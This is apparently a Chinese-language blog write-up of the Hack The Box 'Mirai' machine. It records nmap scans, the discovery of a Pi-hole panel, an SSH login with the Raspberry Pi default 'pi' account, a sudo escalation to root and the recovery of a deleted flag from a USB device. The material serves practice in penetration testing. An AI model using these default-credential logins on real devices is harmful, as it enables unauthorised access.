Mirai-htb-writeup

0x00 靶场技能介绍

章节技能:pi-hole默认口令、查看恢复磁盘上已删除的数据

参考链接:https://joshuasuren.medium.com/hack-the-box-mirai-write-up-25-28ffb2f2b412

0x01 用户权限获取

1、这个靶场可能年代久远,列斯有点CTF的感觉,脱离了显示环境

2、获取下靶机IP地址:10.10.10.48

3、使用nmap端口扫描下开放地址

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
PORT   STATE SERVICE
22/tcp open  ssh
53/tcp open  domain
80/tcp open  http

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 6.7p1 Debian 5+deb8u3 (protocol 2.0)
| ssh-hostkey:
|   1024 aa:ef:5c:e0:8e:86:97:82:47:ff:4a:e5:40:18:90:c5 (DSA)
|   2048 e8:c1:9d:c5:43:ab:fe:61:23:3b:d7:e4:af:9b:74:18 (RSA)
|   256 b6:a0:78:38:d0:c8:10:94:8b:44:b2:ea:a0:17:42:2b (ECDSA)
|_  256 4d:68:40:f7:20:c4:e5:52:80:7a:44:38:b8:a2:a7:52 (ED25519)
53/tcp open  domain  dnsmasq 2.76
| dns-nsid:
|_  bind.version: dnsmasq-2.76
80/tcp open  http    lighttpd 1.4.35
|_http-server-header: lighttpd/1.4.35
|_http-title: Website Blocked
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

PORT     STATE SERVICE
123/udp  open  ntp
5353/udp open  zeroconf

PORT     STATE SERVICE VERSION
123/udp  open  ntp     NTP v4 (unsynchronized)
| vulners:
|   NTP v4:
|       CVE-2015-7871   7.5     https://vulners.com/cve/CVE-2015-7871
|       CVE-2015-7853   7.5     https://vulners.com/cve/CVE-2015-7853
|       CVE-2015-7705   7.5     https://vulners.com/cve/CVE-2015-7705
|       CVE-2014-9295   7.5     https://vulners.com/cve/CVE-2014-9295
|       CVE-2014-9294   7.5     https://vulners.com/cve/CVE-2014-9294
|       CVE-2014-9293   7.5     https://vulners.com/cve/CVE-2014-9293
|       CVE-2016-9311   7.1     https://vulners.com/cve/CVE-2016-9311
|_      CVE-2016-2516   7.1     https://vulners.com/cve/CVE-2016-2516
5353/udp open  mdns    DNS-based service discovery

4、我这里扫描端口并没有扫的全端口,其实是漏掉了一些的,以后还是需要扫全端口的

5、通过目录扫描发现了 /admin 目录,发现了pi-hole 后台界面

6、他的版本是 version 3.1.4 版本

7、到这里经历了各种端口协议以及各种版本的漏洞尝试,但是均差点意思,通过查看参考文章,发现了这里其实找一下 pi-hole 的默认账号口令

1
情况三:安装直接下载的系统镜像,但是没有显示器和鼠标键盘 保存文件并安全退出tf卡。 把tf卡装回树莓派的tf卡槽,开机后,系统就会自动配置用户名和密码,pi 密码是c

8、通过谷歌,成功获取到默认账号,并使用以上口令获取到第一个靶机信息

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
┌─[us-vip-22]─[10.10.14.3]─[htb-shiyan@htb-dwn47a1hvq]─[~/Desktop]
└──╼ [★]$ ssh pi@10.10.10.48
The authenticity of host '10.10.10.48 (10.10.10.48)' can't be established.
ECDSA key fingerprint is SHA256:UkDz3Z1kWt2O5g2GRlullQ3UY/cVIx/oXtiqLPXiXMY.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.10.48' (ECDSA) to the list of known hosts.
pi@10.10.10.48's password: 

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sun Aug 27 14:47:50 2017 from localhost

SSH is enabled and the default password for the 'pi' user has not been changed.
This is a security risk - please login as the 'pi' user and type 'passwd' to set a new password.


SSH is enabled and the default password for the 'pi' user has not been changed.
This is a security risk - please login as the 'pi' user and type 'passwd' to set a new password.

pi@raspberrypi:~ $ 
pi@raspberrypi:~ $ ls
background.jpg  Documents  Music         Pictures  python_games  Videos
Desktop         Downloads  oldconffiles  Public    Templates
pi@raspberrypi:~ $ cd Desktop
pi@raspberrypi:~/Desktop $ ls
Plex  user.txt
pi@raspberrypi:~/Desktop $ cat user.txt
ff837707441b257a20e32199d7c8838d
pi@raspberrypi:~/Desktop $ 
pi@raspberrypi:~/Desktop $

0x02 系统权限获取

9、通过查看sudo配置情况,发现可以直接sudo -i 切换到root权限

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
pi@raspberrypi:~/Desktop $ sudo -l
Matching Defaults entries for pi on localhost:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User pi may run the following commands on localhost:
    (ALL : ALL) ALL
    (ALL) NOPASSWD: ALL
pi@raspberrypi:~/Desktop $ sudo -i

SSH is enabled and the default password for the 'pi' user has not been changed.
This is a security risk - please login as the 'pi' user and type 'passwd' to set a new password.


SSH is enabled and the default password for the 'pi' user has not been changed.
This is a security risk - please login as the 'pi' user and type 'passwd' to set a new password.

root@raspberrypi:~#

10、通过直接查看root.txt发现并没有直接获取到flag信息

1
2
3
4
5
root@raspberrypi:~# ls
root.txt
root@raspberrypi:~# cat root.txt
I lost my original root.txt! I think I may have a backup on my USB stick...
root@raspberrypi:~#

11、通过 df -kh 查看磁盘加载情况,看一下外部储存里是否有flag信息

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
root@raspberrypi:~# df -kh
Filesystem      Size  Used Avail Use% Mounted on
aufs            8.5G  2.8G  5.3G  34% /
tmpfs           100M  4.8M   96M   5% /run
/dev/sda1       1.3G  1.3G     0 100% /lib/live/mount/persistence/sda1
/dev/loop0      1.3G  1.3G     0 100% /lib/live/mount/rootfs/filesystem.squashfs
tmpfs           250M     0  250M   0% /lib/live/mount/overlay
/dev/sda2       8.5G  2.8G  5.3G  34% /lib/live/mount/persistence/sda2
devtmpfs         10M     0   10M   0% /dev
tmpfs           250M  8.0K  250M   1% /dev/shm
tmpfs           5.0M  4.0K  5.0M   1% /run/lock
tmpfs           250M     0  250M   0% /sys/fs/cgroup
tmpfs           250M  8.0K  250M   1% /tmp
/dev/sdb        8.7M   93K  7.9M   2% /media/usbstick
tmpfs            50M     0   50M   0% /run/user/999
tmpfs            50M     0   50M   0% /run/user/1000
root@raspberrypi:~# cd /media/usbstick
root@raspberrypi:/media/usbstick# ls
damnit.txt  lost+found
root@raspberrypi:/media/usbstick# cat damnit.txt 
Damnit! Sorry man I accidentally deleted your files off the USB stick.
Do you know if there is any way to get them back?

-James
root@raspberrypi:/media/usbstick#

12、结果同样的没有获取到,但是得到提示信息了,根据提示使用strings命令来恢复磁盘驱动器*/dev/sdb/上*可能已删除的数据。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
root@raspberrypi:/media/usbstick# strings /dev/sdb
>r &
/media/usbstick
lost+found
root.txt
damnit.txt
>r &
>r &
/media/usbstick
lost+found
root.txt
damnit.txt
>r &
/media/usbstick
2]8^
lost+found
root.txt
damnit.txt
>r &
3d3e483143ff12ec505d026fa13e020b
Damnit! Sorry man I accidentally deleted your files off the USB stick.
Do you know if there is any way to get them back?
-James
root@raspberrypi:/media/usbstick#

13、这里其实使用 grep -a 也能获取到flag信息的

1
grep -a '[a-fA-F0-9]\{32\}' /dev/sdb

0x03 通关凭证展示

https://www.hackthebox.com/achievement/machine/1705469/64

打靶记
#shooting-range
Mirai-htb-writeup
https://sh1yan.top/2023/12/13/Mirai-htb-writeup/
作者
shiyan
发布于
2023年12月13日
许可协议